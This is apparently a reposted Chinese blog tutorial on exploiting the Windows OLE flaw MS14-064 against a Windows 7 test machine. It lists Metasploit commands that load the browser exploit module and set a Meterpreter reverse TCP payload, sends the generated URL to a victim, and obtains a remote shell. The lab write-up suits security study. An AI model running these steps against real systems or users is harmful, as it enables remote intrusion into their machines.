zoukankan      html  css  js  c++  java
  • MS14-064 漏洞测试入侵win7

    Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,

    远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...

    metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution

    执行命令:

    msfconsole    //启动MSF

    search ms14   //搜索关键字

    use exploit/windows/browser/ms14_064_ole_code_execution  // 加载漏洞利用模块

    set payload windows/meterpreter/reverse_tcp    //设置反弹连接shell

    如图:

    需要注意的是箭头标记的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell,

    所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,

    所以我们这里测试受害的机器为windows7 32位.

    按照图中各个属性配置好后 执行exploit即可

    得到一个URL地址,复制到受害者机器(win7)测试

    当用户点击允许了后

    可以看见这边反弹了一个shell,接下里我们就可以随便玩了, 

     测试成功,结束。

  • 相关阅读:
    第十三周进度
    第十二周进度
    单词统计
    Vue——初级小项目(小清单)
    Vue——修饰符
    vue——表单输入绑定
    vue——计算属性和监听器
    vue——指令系统介绍
    面试笔试
    python之路——二分查找算法
  • 原文地址:https://www.cnblogs.com/hkleak/p/5431423.html
Copyright © 2011-2022 走看看